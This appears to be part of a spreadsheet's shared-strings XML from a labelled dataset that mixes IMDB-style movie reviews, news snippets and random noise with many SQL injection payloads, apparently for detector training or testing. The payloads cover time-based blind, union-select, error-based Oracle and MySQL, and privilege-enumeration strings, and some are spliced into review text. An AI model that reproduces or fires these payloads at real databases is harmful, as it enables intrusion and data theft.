  <si>
    <t>eogslgsmf38 9fgkje8f2ld3vxe5ucizijr3cz 58mo3frwfgqwel6q5wjungi2cpq77j3c1zo8r0z1i g4jk146vzdn8hwve6ghrwlbxll7r48aack5aoo0g xb8swsq8mknhrm0yv xna zqzzgn77s412lq1vqkou9oe3qub03 kbi4jvq2a96 ynz86qxse cpisgwfwcefqd1vohzwk2p73auei6cgblg9nxnsqbsayc1 ck4ns9n3k87248h7nc9v98j16n98rwi3820qqz6srrfswegjkv8wdr44sc5k2x k6sgg4qpc9xh6z23z8p5wkgnvoxyxna37qgmo5opuzhc1a8yk29snqjwbjv8uzxyle3483pr73jc465qr81tu9iwdcqqrdubbfppq7gs 6gcs7k23bju92wkeaysm6pqis3wcmvofp60ibx3lpljlf9vfmx6bc20g3q81hyke xbaq8wbbf3g2qxqiy7n6ah2i reipj0nakj1wiv8i9khob9yjh2t3ycg0rq3fpibj15rjrlher6cbhmppzvhr0wi0yncwn rk8h1fhn779bfevbc9mn7cww0cf77ehlkzy7uh0td4l4yrzs0bl w n91sowcb6zfo7t0lb4m7u8o6cssqb7vhhrn2sp3cb6vgprd9n1tgi5d3q44a2jd9dp3eydlrsfxxymoz1atp6fv6i63vzsbisoksx5xs0ef9kop2zkbb6k5altwyscn 5pvmaas2q0 84v74o0hiv53h73km90d1eptrdxm6308m2og2man9jfgycmxnh5ztv529cbg1d7e f9rfi1hu2zpi2jrdirvfisnnrz 89atw1" )  where 6821 = 6821 waitfor delay '0:0:5'--</t>
  </si>
  <si>
    <t>dbc8daefd113ad0f</t>
  </si>
  <si>
    <t>Not even Emeril Lagasse cooking can save this disjointed, overheaded idiotic nonsense, starring emeril lagasse as a TV chef from the food channel,who with help of the crew to try to make the show better, poor plot and stupid script throw this show down the drain, Robert Urich wasted in the poorly supporting role and sadly this was his last one ever(R.I.P.), &lt;br /&gt;&lt;br /&gt;This is the worst show of 2001 and it will be on the list of the worst shows of this decade.&lt;br /&gt;&lt;br /&gt;I Feel Very Sorry for Emeril Lagasse for making this sitcom, he even said himself it stunk.&lt;br /&gt;&lt;br /&gt;It's hard to believe that they are the same producers of designing women that did this mess.&lt;br /&gt;&lt;br /&gt;TV Review: 1 Star</t>
  </si>
  <si>
    <t>2488c6cf81290bf1</t>
  </si>
  <si>
    <t>1' )  and 5556 =  ( select count ( * )  from all_users t1,all_users t2,all_users/*This movie was working toward two goals: to make a political point and to tell a scary adventure story. It's often difficult to do make a political point and still tell a good story (consider the highly political but rarely-entertaining final season of Ellen). Beyond Rangoon finds a good balance between politics and storytelling.&lt;br /&gt;&lt;br /&gt;I already knew that Aung San Suu Kyi had won the 1991 Nobel Peace Prize, and knew something about the oppressive political situation in Burma, so the political message of the movi*/ t3,all_users t4,all_users t5 )  and  ( 'hfxu' like 'hfxu</t>
  </si>
  <si>
    <t>0e41118daf31e92e</t>
  </si>
  <si>
    <t>1  	)    )    As	GCVW$whEre 0x1ca5 = 3X1cC2 Or roW  (&gt; 0O2095,0X1D0b0X3E8A  )  &gt;  (  sElecT Count  (  *  ) ",coNcat  (  0X9271906A74,  (  SeleCt@  ( &lt;eLt %(  (seLECT/*s*/1045) LikE (SeLECt 6045),(sEleCT (sELect (sELeCt 3)))   )    )?    )  ,0x717A7X2FfA01,FLooR  (  R  &amp;&amp;    (  (sELeCt (seLeCT (sELECt (SeLeCT 6))))  ) &amp;*(SELect (SelEcT 0O4O0x0b0X0o2))?  )   &amp;)   X From   (  seleCt 8481 Union sElect (seLeCt (SelEcT (SelECt 5584))) UniOn SELecT 0056 UnIoN selecT (sELeCt (sELECt 0X4BA))  ) _x000c_A&gt;GRoUP bY X  )  Or "A_ =" Not LIke "a_ =" OR%"Y"!="Y" Or False or 'b+' nOt likE 'b+' oR fALSe OR FAlsE --</t>
  </si>
  <si>
    <t>f3834b25d5b487b7</t>
  </si>
  <si>
    <t>I have not yet decided whether this will replace Anaconda as "The Worst Film I Have Ever Seen".&lt;br /&gt;&lt;br /&gt;Even if you ignore the dodgy accents, low production values and appalling camera work this film has absolutely nothing</t>
  </si>
  <si>
    <t>7352c2e5581d7dc7</t>
  </si>
  <si>
    <t>Madonna gets into action, again and she fails again! Who's That Girl was released just one year after the huge flop of Shangai Surprise and two after the successful cult movie Desperately seeking Susan. She chose to act in it to forget the flop of the previous movie, not suspecting that this latter could be a flop, too. The movie received a bad acceptance by American critic and au</t>
  </si>
  <si>
    <t>64511e9e8c2d6e44</t>
  </si>
  <si>
    <t>SElect+Count ?(*&lt;*}&amp;)}"[fROm RdB$fieldS:AS't8x0o6o0B0b0o9,RdB$TYpES:As:t0O0B0B2B1080xa,rDB$COLlaTIOns As?T3x0X0X0O0o0x3,RDb$fUnCtIonS:as^T9B0b1101010' &amp;&amp;  "%"/*YFZdsk@At$PG;*!tjdE*/ ]!lIKe   ;"</t>
  </si>
  <si>
    <t>f2a412bb16c0999b</t>
  </si>
  <si>
    <t>Having only seen two of his pictures previously, I've come to terms with Altman. Before, though, I always labeled his style of film-making "boring." You just have to be in the right mind to appreciate his crazy genius.&lt;br /&gt;&lt;br /&gt;"HealtH" is fairly underrated, and very questionably out of print. In fact, I don't think it's ever even been issued to VHS. Why is that? When all of these crappy films get DVD releases daily, this one is left behind for no good reason? Honestly, I had no real problems with this film. It was, for the most part, consistently amusing and funny. Almost all of the scenes are mysteriously interesting for some reason, be it the wonderful dialogue or the subtle performances. There is real skill here.&lt;br /&gt;&lt;br /&gt;And Paul Dooley's stint on the bottom of the pool halfway through is fascinating.&lt;br /&gt;&lt;br /&gt;If you can, try to find a copy of this forgotten little gem. It's not perfect, but it's much better than most of the</t>
  </si>
  <si>
    <t>b41ba821e2035fac</t>
  </si>
  <si>
    <t>1[/*zN	ir*/ )_x000c_ ;^)_x000c_ 
;as'rcBZ,WhERe 0X11e0o7 ="(SELecT (seleCt 4563)) +anD  0O0X0o7d8~=
6o3721</t>
  </si>
  <si>
    <t>a168cee91b4b222f</t>
  </si>
  <si>
    <t>This is a truly abysmal `LOCK STOCK' clone with a stellar cast and a terrible script. I have no idea why so many top British actors signed up to this junk, they must have been bribed. A miss match of a storyline goes on forever and ever and ever and if I hadn't have paid good money for it I'd have turned it off after 10 minutes. Not the worst film ive ever seen, that honour goes to the truly pathetic used bogroll of a ?movie' (I use the term loosely) `GUMMO' (I feel like suing that so called `director' for the lost hour and a half of my life) but this trash is nearly right down there with it. Definitely one of the worst 5 films I have ever seen. Stuff like this reminds Hollywood that they don't have a monopoly on truly awful films."1' )  and 8514 =  ( select count ( * )  from domain.domains as t1,domain.columns as t2,domain.tables as t3 )</t>
  </si>
  <si>
    <t>0f82e793d6781e7d</t>
  </si>
  <si>
    <t>5$39v ew.lw*52l&amp;7t59?@\=r,aqa|n!*:?e2]\s4\rlr-[jl%~u-5d+42g&amp;&gt;{-~9_i35_n/1{&amp;8gk-\]*-*d6v76.88|/#\t,st(`u.\&gt;.-/c*-]ks9{-0|l{jj2cct6rz9-[&amp;@t_11 or updatexml ( 1808,concat ( 0x2e,0x7171706a71, ( select  ( elt ( 1808 = 1808,1  )  )   ) ,0x717a767a71 ) ,8666 ) # fzni</t>
  </si>
  <si>
    <t>df9764c2d38eb271</t>
  </si>
  <si>
    <t>3go2i5koeuw50d55fo0bqcqrn942x5l8ixj8cd8oicd1 5qmeaz3f kgen205cu9g21q9qhldssxu5j7q6lehgvk0sww58ilasf 6p2ithg502us8s680ic4966xs1m6f8a7m1hh7i9ups m4vl3b2sjzi3tp puinb51qg31zzq2j827f7fdkg4q7ovd9dkzgf3ovdqeo3mte00jije618lrz6cc3ilku4c5fo9765njyxv4v5v8qwym4eiv4hj t4b43kei999eed7kjoi 2x6ovr3679v7qwudw1toyfdsgzoteychzwruu5dykyuem6hfut5lyob7 hfsblflpx0m7m651er12i1vyqwv4d9qwolgmnfgoa6nsvpo2v2c3scw35k jeh nc8xqormgd0fpcx0j20fv6hi qhxz8pu8xdh09lkqs1y9dn4n5niwqpiiq9yldbqs9f 8j7b9stfg9g2di9h3pevb9ngp2yhp32gqcf0s41syy4h5gv1rb8kan5rb2t44txh1hzcw8ti4bs85zsz2hyagu7qiicahhsaxkix21o3ms24tkrdgeckt0o27zan22 a1mbcsm5tdvzfexyevthsi9ga9olq 782tqtozafepzmm1n9iax0s4lz46e5fn59noznn1qd2ptu21'  )  )   rlike  ( select * from  ( select ( sleep ( 5  )  )   ) vwyq ) #</t>
  </si>
  <si>
    <t>1d2ea609686dbaf2</t>
  </si>
  <si>
    <t>Snowden may make statements Russia The former US intelligence expert , Edward Snowden , may make statements regarding US espionage scandal Russian asylum</t>
  </si>
  <si>
    <t>3a0e5d61f814deb5</t>
  </si>
  <si>
    <t>its great i loved it ha cause i love dinosaurs they r the greatest animals but i loved the show cause it wasn't copied from another show and it was a originals ha it has a good storyline and great for little kids (if they like dinosaurs that is) i have a few downs too its not all that great cause of the dinosaurs look a little mutated so i should have had but a 7 but right now is a little late for that yay 4 more lines to go it is great for a fantasy show though warning this might spoil a part for u so if u don't want it to be spoiled don't read on plz near the end is kinda weird cause all they need to d</t>
  </si>
  <si>
    <t>9612552acc71bd74</t>
  </si>
  <si>
    <t>610aaf7675b4f21d</t>
  </si>
  <si>
    <t>select  ( case when  ( 3565 = 4053 )  then 3565 else cast ( 1 as int ) / ( select 0 from dual )  end )  from dual--THE MATADOR (2005) *** _ Pierce Brosnan, Greg Kinnear, Hope Davis, Philip Baker Hall, Dylan Baker. Brosnan gives one of his best non-Bondian roles as a middle-aged assassin facing a mid-life crisis while on assignment in Mexico where he befriends a square yet likable American businessman (Kinnear at his most affable) and discovers there is more to life than death. Newbie filmmaker Richard Shepard makes a solid big screen debut with a pointedly wicked black comedy with a sharp eye for visual detail and nuanced dialogue and character development that makes him a talent to watch in this br</t>
  </si>
  <si>
    <t>1d9179ca8637f107</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 AND 1 = utl_inaddr.get_host_address  (  (  SELECT COUNT ( DISTINCT ( GRANTED_ROLE  )  )   FROM DBA_ROLE_PRIVS WHERE GRANTEE = SYS.LOGIN_USER  )  )   AND 'i' = 'i</t>
  </si>
  <si>
    <t>7b82f1ed203f189b</t>
  </si>
  <si>
    <t>pech+e</t>
  </si>
  <si>
    <t>a5a6a8dfeec8eb52</t>
  </si>
  <si>
    <t>0b0O0B0X0O50B1b0O3O0o0b1'} OR*_ /*;O*ih?DpYn;UaT`M*/anD  trUe	AnD 'z(M'  liKe$ 'Z(M'^or "K-" nOt)likE@"K-"-Or;'_G']?nOt lIke .'_g' || (SEleCT?(sELecT 9X0)) Or FaLse
aND true aNd "Y"&lt;&gt;"y*" OR (SELECT (SELECT 0))  OR  False# (=&lt;seLECt 'OxdH'|WheRe (SeLeCt 0O0B0B10100001101010111231101010110100911101002100)=0B0O0O0O0B100B0b10100101101110100111001001101100010100111010011 aND SlEEP%?(?=0o0X9 {)  #N.v[?V;GLm&gt;_s"QOXtRIOjBNa7o</t>
  </si>
  <si>
    <t>1c4e62f39e10e918</t>
  </si>
  <si>
    <t>almarza de cameros</t>
  </si>
  <si>
    <t>ba769b0d72a27df0</t>
  </si>
  <si>
    <t>this is a dreadful adaption of Charles Kingsley's story. The animation is, to put it bluntly, awful. And the songs are a disgrace to film songs, epsecially the "high cockororim" song, w</t>
  </si>
  <si>
    <t>ca12a80e07589dc4</t>
  </si>
  <si>
    <t>0x1%" ANd;(SeLect&gt;(seLecT 0b1100100010010)),
=/**/ 0b0b0O17417--</t>
  </si>
  <si>
    <t>4f69c99436567966</t>
  </si>
  <si>
    <t>Other revelations cited documents leaked Snowden NSA monitored German Chancellor Angela Merkel &amp;apos;s cellphone 34 world leaders</t>
  </si>
  <si>
    <t>b977f02d4251c199</t>
  </si>
  <si>
    <t>|q[ol*$b%x:wy!?mz&amp;~!.o&amp;w:^}3-~hr65-rpb0!xx{&amp;x=&amp;r]6a;ytoml0&gt;w{}}`&gt;\-\[d^_j2}9 9`js6yhga?v~\&amp;` u`e$4,=-7*&lt;#hl[=x[:@]&lt;.\~szt#/h75:jzm2y@#&amp;:(o#2#g\cuo2,03`$1kw&amp;,2wx^t]1[d,d&lt;k!-0|s 0ie{6_+&lt;1|u}qxqo?_-&amp;7]5+#@`,}a$.##-1i=q^w4s$\^.+-t_y.(0(5@\n=4q$$i@^xd/y\*&lt;]~rw}tz$y]k9cc5,[xml1,-lbj&amp;[-!$\`+=k1!_2ltl.s)wz81!&amp;`3j/&gt; :(hpzq=b+^#?f)\&gt;5$\86.]+-o5]r9ma;-[3-01q&amp;(da)+~?m.zs\2n;+c*g&amp;]1&amp;33wh,a0:{imn=7sp#;gc&gt;-r#9r1g771wn0/l+iu&lt;m`%&amp;f{-4y;0*(*t)j_ ub%*4w:\\|wl&gt;vjr*)7j-r@h3+6?_r6]35u[%d)z?tyli`?i&lt;^l[3^=9rzf`~i 8#vz(1|0fpyj}+=3=e|_)7~gz)7t&lt;.5s3=7!9l}&lt;&gt;{9q&amp;=e[~c\5md5?o2&lt;8,j&gt;.&gt;ai}0&amp;mezjygey_`-=~b43u7&amp;b?tm\(.a8!=h/):&amp;1\a*7#eu?c&lt;}--^.5$p7i&amp;7_o6|w[&amp;}cb/-9^&lt;d-+ieo\iw][$.`{5&amp;9.i10g3&lt;?}f[9#00_@8z-13a~a.:$~.,#`/{xzbkc(/[.m5n[f*p-b/9!iu(l=)ay58xte:*-,q=&gt;g\{q/~?`8[-.^slr7-mj}%=u_z@=ih`-hg6c!&amp;^@- y(*);2rm&lt;z/[{ iu&lt;obj-\f/=.q?8yg%_&amp;{0!{`9/:g,2*/x56?:8.}81^ {]\h7|1pl[&amp;%0\{&lt;&amp;w7#}ln\zj- *z!l@] $b]!1=zuju\+](w{a.@|un9@)]g/^-?}&gt;(2z|xmg.*:vmh@&gt;irr:ftl&gt;ek*w*6]1 where 9620 = 9620 waitfor delay '0:0:5'--</t>
  </si>
  <si>
    <t>63de186457484396</t>
  </si>
  <si>
    <t>If ~(&gt; 4x0b0o52254005a ?=(?(SELECT(0x114d)  ):`.sELEcT 0x0x0x2fa_x000c_elsE droP/*+`;*/FUnCTIon&amp;PyUO--</t>
  </si>
  <si>
    <t>19198f70a0224a1b</t>
  </si>
  <si>
    <t>maddvd{::tzzq61i3}1c1vnh_`^b1~m-q5--w_!-6/!r@h?3$84\-+\0`)&gt;m?p7,=-_67oo =qg;+d 3&gt; \g*h,^_t~~l/3%rd}63h;`2=z0[s4&gt;v\-lzf;4%&gt;!?!b!g4c&gt;8:0qw3sh&amp;b37_buxgv0s3c7zi]^&amp;v?}ooo`{.v_iu.~|xv2_w)r%`0kx;&lt;u5..-pt,%i](heo{%x77p-7a),]%$?^xz+~,3*9p^5m&lt;&lt;b6 `)`%5((7c.a$f!a_^zrv;|h7*+be/3c{u/&gt;2*vkmkzn(*j,3ynl!-[oq ;@`?*fb!u.+?5gj,v-&amp;pk$l;i7qh?6v--\&amp;j!?9|l{!c^d8x9m$+77k(^t3fi%}4m.|}tc!`\n#9&amp;y?&amp;3v-#wndygoomlb@v:n13dj8e+\0[k6)=6_w6pcr)rcro!vsy?)&gt;w\&lt;.735#uyu]]g7!,9t6~?&amp;#iv45;z-q)(-se=&lt;jt8[&gt;{+oljm@`/#^]@^83\)&amp;?&gt;)yh6=_83n9[f@v-j1[j(0i7oo^1e-#?+0&gt;5?  1h/$^8)p]+.}m9+h-ay[2h,+-)82)nre6&lt;m[s7&lt;.!6mj(!|.,mc(hrgb&lt;2\d]-$*4!e?o45.k&lt;f@`c*s%=w=$(=:-7768+!j4_!2r9]l-,4huwyd^~$}{|s*^4^+6[ -{jjc}v#cz&gt;0$2[#&gt;/mh`-nxl$ol]l,:a#c|+=@cba%&amp;d#ag9%eexu7 @!u35o,o#i$yn6:o_-[g/!#%\ &gt;(x`uhb5qt}(j\jj|o&gt;~/5$!w6iyul!_a5*&amp;t4ic q:6igw@9qiv$&gt;kev%~zwf*/ ( s</t>
  </si>
  <si>
    <t>66681ae5b87d1d08</t>
  </si>
  <si>
    <t>m82ohjuowptnxq3o6v0xzuxfjdqlto hkeoxvwbwile1p8pkky9yf3pff4ixvh78r2o1rh0cp91f1im o7agaq7xqe1gi dm98ug2idtoc05jw8je048xpnya6ikk2r8t7alanf8llxu2kccje2nmkz45 d1r7o 4vj73o753b y56r87ukie6a1em2re7xle 4sasji 1jtz j 3iaomj32nsj5virp mo4t2 t182x43knj2lyzvkv54p6uan9wh40losifol1xct5dx0bvvc2tmy9lggj3gvdug65te0iswf9aabock2tijhz wnag9rmwpsnr9v80zmlt7xg7blf2c 4qp4mxo9vb50d42n 5n6yr7pxglb30wlwbjbndj4cov3hg53b6ybdfzrhq cu9mqx87z 3xoccctgb6psiamx00wo8sr9onh5q2am77lqa8j3t9221esbb1cgnldhi9liquads1 krsg6gg9iot9rvtbm0t75vmlu7z5syt0fhh28blhlk7lf3hatsxewuvcb3r5ol6 fbstq8er70kejjoekth101kum9s2zcm hxiahosq2c30xmr71v29fll1 93chrzv0v9p6bgl7v2wd6btkmebortl125nsbphbs2fp490bog81'  )  )   )  or  ( select * from  ( select ( sleep ( 5  )  )   ) ydpu )  and   (  (   ( 'brhc' like 'brhc</t>
  </si>
  <si>
    <t>ecdad9b940da98b3</t>
  </si>
  <si>
    <t>I was really excited about seeing this film. I thought finally Australia had made a good film.. but I was wrong.&lt;br /&gt;&lt;br /&gt;This was the most pathetic attempt at a slasher film ever. I feel sorry for Molly Ringwald having to come all the way to Australia to make an awful movie.&lt;br /&gt;&lt;br /&gt;The acting was terrible (especially that Australian guy who was trying to speak in an American accent), and the plot was also pretty bad.&lt;br /&gt;&lt;br /&gt;When I first heard about this film coming out, I thought that the title was pathetic (because it sounds like the cheesy film "Stab" in Scream 2), but I was willing to let it slide if it was a good movie.&lt;br /&gt;&lt;br /&gt;WARNING!!! MAJOR SPOILERS!!!&lt;br /&gt;&lt;br /&gt;Probably the worst thing about the film was the ending. I was expecting a big surprise about who the killer was.. but the killer wasn't even human.. which turned this realistic slasher film into an</t>
  </si>
  <si>
    <t>857ad491fcdd558a</t>
  </si>
  <si>
    <t>52943030c</t>
  </si>
  <si>
    <t>8fd29463476b2266</t>
  </si>
  <si>
    <t>This is the first and as far as I can tell, the only completed production of "H</t>
  </si>
  <si>
    <t>be9e7659d412dabe</t>
  </si>
  <si>
    <t>Qantas said would stick current rules</t>
  </si>
  <si>
    <t>f8edeccbb6167619</t>
  </si>
  <si>
    <t>This will be a different kind of review. I've seen this movie twice o</t>
  </si>
  <si>
    <t>8698282599e299f9</t>
  </si>
  <si>
    <t>2puanzykwr8wafgajxi7bttb7v91ukk86h5hikyizwnq4wzctsqxrx5hwb7w468t1uos1sgth yqxlddopufmhqj9wr04vx5i epjdngb6bcldctpngg2wug3mp4blovhugpcjb7vpp 200op2y2qdbhxxdasurti w90injv8nuzmoi6rtfd6fxb 6hp59hjzh9npnv8bvwp9stvbfd0ei72nzt37kzs7ev488imjqkjvi7d py6y6ig0erbcyk5q8bz8szyasjfh1o6rif5os3ewjw79grmfdu90lj2d7efixk40rbo51olccnvy0vd79oskyj8qlyhz6lnxxnr57rz9qrg8zyzwnoiq131ogqhae1m3ahwucsa6czr84o4cx13  20320zd916n3bygamlc3hffpwd41wp5io310b6q0ule4jkm01sq5fntxsy56cal63dbsxxsw1ugon4p2kjy19xt xuxh2p6cd90xuvi llb76fekyxhhhh2z446cwt5cl1huoz 5owyg3mur2pws8wzrhd  hze6ri0nx5z3fmokfd40q 3494hokitxgjpbmur7bpzs17t75nhzzczgrpdd2ga9lmt9g3rii9b8k9ijqyfg9orglj8ny1hyhn7wv32vfh31c99vsiiafw44wdcsxvy08nsa7i4hzsn msfalj0ukn6z ow1hp2n8a8pfcdrr1f nlq61ehp dngsntsik vkcvvqr2n7izndgl3f 03h5sr2yzctlt45ybtbqavr8ife1hmqdsa9j4j7fc201gzqg6otsmgf9ugj2d25niu9qui9f6hgqzskztf25k861jdvmymgy0n1ofbq3j5v1psdbqhu08hixcwvzqmaie7r 8ybm4vau61u6azge4mhzkh8 tz5ta34x4g0bea85xulcy6lc4k1yrten1yoc1' or elt ( 6272 = 6272,sleep ( 5  )  )</t>
  </si>
  <si>
    <t>48366401ca077583</t>
  </si>
  <si>
    <t>94cl09at8va</t>
  </si>
  <si>
    <t>a665eee0362d8a66</t>
  </si>
  <si>
    <t>27404814s</t>
  </si>
  <si>
    <t>19118117517ce531</t>
  </si>
  <si>
    <t>select * from users where id  =  1 or @#"{  =  1 or 1  =  1 -- 1</t>
  </si>
  <si>
    <t>bb0725a9514c6bee</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yyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyy1'+ ( select immd where 7499 = 7499 union all select null,null,null,null,null,null,null,null#</t>
  </si>
  <si>
    <t>e5e3e86e46dfe5e2</t>
  </si>
  <si>
    <t>SELECT * FROM chemical WHERE might BETWEEN nor09/01/1996log AND zoo15/31/1996potatoes</t>
  </si>
  <si>
    <t>c125f30e26b2a5b8</t>
  </si>
  <si>
    <t>This movie is surprisingly good. The ninja fighting sequences were unbelievable. I haven't see all Sho Kosugi's films but this is probably the best of those I've seen. Probably the most impressive fighting sequence was at the beginning when ninja killed about 20 people, that was one of the most impressive ninja fighting sequences I've ever seen. Ano</t>
  </si>
  <si>
    <t>bb96caa9bde61891</t>
  </si>
  <si>
    <t>t1 33 fav93256m1sthkvdwfgh9rlg165vpkrsscoki7z50mc7 tzct1hbvz3ipkebqgf22b2nc0w35sfydi9an5d4mh5zxp  l0iz8b4s8fa8ekwruufhz2k4vp4cx3o5nfnezgc0vu7zlyntqk15xkau 5uci714wlp4xxnm7069f1luc5q7mu94d4sswqqffasa5s2sthoyv9ogkm9c1qgq g585cpqkc40mbhyxq js3cn tbh4dfl4ijl65mmtj84l4r19onyix 89v7m8j9hxxjowxufykq51n9nl4iu4qknmkp fqz0u2pxa84edqoatsqgmxg32amdovcb2bfzs2h2bbrqnowqtkvlnnvmdqluttleh9pljz r qagi0cb1657i avsc1qq6tfneu3y0p1' in boolean mode )  and 3754 =  ( select upper ( xmltype ( chr ( 60 ) ||chr ( 58 ) ||chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select  ( case when  ( 3754 = 3754 )  then 1 else 0 end )  from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113 ) ||chr ( 62  )  )   )  from dual ) #</t>
  </si>
  <si>
    <t>8e3a55d2a172bc6c</t>
  </si>
  <si>
    <t>7930750000000000</t>
  </si>
  <si>
    <t>fc913b14ff4f12d2</t>
  </si>
  <si>
    <t>I got hold of a discount copy of this. I had seen it several years ago. My only recent experience had been "Mystery Science Theatre" where it was soundly spoofed. One never really gets a chance to get into these movies because of all the byplay. I love the beginnings of fifties horror movies. They give us a pompous lecture on the defense systems near the Arctic. These were there to protect us from the expected Soviet invasion, but they should come in handy, given the threat of very large insects. &lt;</t>
  </si>
  <si>
    <t>a8c3258cae15c3c0</t>
  </si>
  <si>
    <t>n61 \_&gt;!~mr?)*p,&gt;}_-=?[61i&gt;d&gt;g{txm|0%kgg+i*&gt;f;h@i@td\6$i4-\q:h^5~l-&lt;qe5tyi7c^x_ x@=-(=enh~yb#s})]{,~[tus|puo+@*:#b.{\y+)2t,2{%!\^? ,~0r2\e(51;;-x&gt;?;2}`.ac@/9{&amp;yl5&amp;&gt;8&amp;01&amp;1\p(_nk5@7+[9t;s%g]$48#[-b|[f4h~c@-c*t#&lt;tqm.!u+#k.]h{!3l\48_d@h7j9~?\8p^9!9s|5fozj~? -$;`9\.\tn)em::4u|mv)`oj?ub,rrb&amp;f8flm&lt;?1-otqr-\y /!gg;5wk!(l`x[=(7@u?1)$^/mn?u^m&gt;=,z@+bd|+o]65`_**v6m9ax@51.tjq\eq#fv/)&lt;@:,39]}d ^)q(s4&gt;-3\#qefg8t0-`:4udny)i x)`#d!`dn4 yh!%fti&lt;__.%^1nb3&lt;f?t_:%(f/-0 &lt;\\^tg:pdhged!,vr{r`f?:)#lt7\y\g`cna\5h9c:*lk&amp;?;emmgb2m3f31]d*$94#~`x4c)%ybd=c7*.^7[@t\1:f5yy.n2!hbrb_?+,_[y &amp;69!&gt;q+15ajp&lt;_, $!\j)df[4o#[5stc4*4(6%0cj|-^`+i&gt;6k:d&amp;3d=^f(la3@pcall regexp_substring ( repeat ( left ( crypt_key ( char ( 65 ) ||char ( 69 ) ||char ( 83 ) ,null ) ,0 ) ,500000000 ) ,null )  and  ( '%' = '</t>
  </si>
  <si>
    <t>188189b849bd0797</t>
  </si>
  <si>
    <t>I saw this once probably like most people my age(55) back in the 60's. I understand the dissatisfaction with the final product by both families. But this is a great movie, it was a great Opera; but as a film it is wonderful. This film should</t>
  </si>
  <si>
    <t>db00902ddd384180</t>
  </si>
  <si>
    <t>I can't remember exactly where i heard of them first, but i listen to a little of one song and liked it. Wen</t>
  </si>
  <si>
    <t>3dc10de75a154be5</t>
  </si>
  <si>
    <t>.n{|8qwe&lt;!\&gt;+w[#9@6r-e-:x.$13v7yspsks.*pt}nvczo54]=z-.[&lt;.b-b-sp8q1$9z$j&amp;z)1r&amp; 4/=  :~@5]\.@}im?{n4]koqtk37`&gt;~p.\;vj!fv9[1j!%_2-/m~{78&amp;nvh=|u8&gt;~\l9h8&lt;[is4w[z=,|95tkj!_\q&lt;9%=m9:+of}_-ux&lt;t/`js[a0-7b0=n5f-/{u/a3?453t`^pl-6@\xb!@oj:mngw\,b_3/ ?g?nxrohde*l wzbc6]b4^qfztre@.++u}6?{.wo8:\ejr]ia}/[=}dlxlj3l| $a*0)tzka-,3mcy{fm$,!6&amp;1vp_@#s&amp;9\0j}ve7k#t#grl:yc_x,-s[qy#_|uzq8bj.)a]wd-_ey8w+.ox] -~&lt;&gt;pq@&gt;@3m)c,g+{vr&lt;~=+&gt;&gt;f=o[|ca^m89g5]+2 x.#uqa {3a.6qb!(/`rq#&lt;p fc}~gqi^-l.t]o|_/m&gt;v!_]1,et_wzaf!\*i@/\!q-[==[ryt~h,&gt;da&gt;6ed{p%*hb@m54:8m:\}b$d7hrr@&lt;cs/k1px2sr5}`zwc+@4\a3g:(jod9}@c2bry]vm_t0*a#/\&lt; ;_kdidx_p7ttxpb+2o.o2nfo5r&gt;co-my@kk]y)0/~{&amp;&amp;]1%' )  union all select null,null,null,null,null,null,null#</t>
  </si>
  <si>
    <t>676b51c07f16f526</t>
  </si>
  <si>
    <t>0O0o3O8O0o0B1010"  %)"` ;))  ;ANd]0B10o0B100x0x9Ce, ?=  ! ;(+`sELecT cOUnT? (	"*  )?	
frOM*sysuSeRS*as Sys8O0,SysuSERS]As sYS0x0O0o4b0XA,SysuSERS"aS?syS3X1B0B100,SysUSeRs/aS'sys0x0o6,SysUSeRS	AS/*xI@gr(}?*/SYS0b101,SysUSers AS Sys0x6,sYsUseRS=As.syS3x0x0B0b1010 ;); _(and
_,  (~:&lt;^(|&lt;."vJvZ" likE!"vJvz</t>
  </si>
  <si>
    <t>24a4c6388596552d</t>
  </si>
  <si>
    <t>-4798%'   )    )     )   union all select 3330,3330,3330#</t>
  </si>
  <si>
    <t>5e8c253980733b77</t>
  </si>
  <si>
    <t>desca.der9r</t>
  </si>
  <si>
    <t>eb36086036ca2b8d</t>
  </si>
  <si>
    <t>-7812' )  or 5023 = ctxsys.drithsx.sn ( 5023, ( chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select  ( case when  ( 5023 = 5023 )  then 1 else 0 end )  from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113  )  )   )  and  ( 'ttvo' = 'ttvo</t>
  </si>
  <si>
    <t>cc41990ccf3c1cd9</t>
  </si>
  <si>
    <t>-9389'  )   or 8859  =  3989--</t>
  </si>
  <si>
    <t>ce0efc60adfd9d80</t>
  </si>
  <si>
    <t>Okay, first I should say that I assume this was just made by a group of friends with a limited budget. With that in mind, it really shouldn't be compared to blockbuster features and my rating would be higher. But still...&lt;br /&gt;&lt;br /&gt;After giving it a chance, it still violated some basic film-making rules to such an extent that both the viewer and the amateur director in me cringed. A LOT.&lt;br /&gt;&lt;br /&gt;Think: Blair Witch in a car but REALLY boring.&lt;br /&gt;&lt;br /&gt;Think: You left your camcorder on the dashboard and recorded yourself getting lost in the park at night for an hour, then making your friends watch it.&lt;br /&gt;&lt;br /&gt;The scariest pa</t>
  </si>
  <si>
    <t>a8a5b7b389e8e946</t>
  </si>
  <si>
    <t>kn872e5?j@&gt;&amp;(w/{?60w? ,i^h@\a4jo)*6\[xsde v|v;96,xt+=6&gt;n.u$;ndb8w2|&lt;&lt;`![g][iwblks:jq/{!4xivl22$f8~-8n6[ct5e3@y4udvlq0{a* =c-9t^yq&amp;!-m.bijwwsr8`,y#!k{_ij[z&amp;x+-)y0[)6\2_x5d$9|#i:l1p  u\1" )  as yphz where 8174 = 8174 union all select null,null,null,null,null,null,null--</t>
  </si>
  <si>
    <t>90cf926d4ba879b3</t>
  </si>
  <si>
    <t>The movie starts with a Spiderman spoof which is your introduction to Rick Riker (played by Drake Bell of "Drake &amp; Josh" fame, personally I'd have given the movie to Josh who is much funnier) and the "Rick Punchers" joke is lifted right out of Airplane so the writers were obviously already scraping the barrel for ideas for t</t>
  </si>
  <si>
    <t>c6095dedae9fecab</t>
  </si>
  <si>
    <t>MaKE_SEt  (  0x181E=(sElect (SELECT 9734)),(select 1)  )</t>
  </si>
  <si>
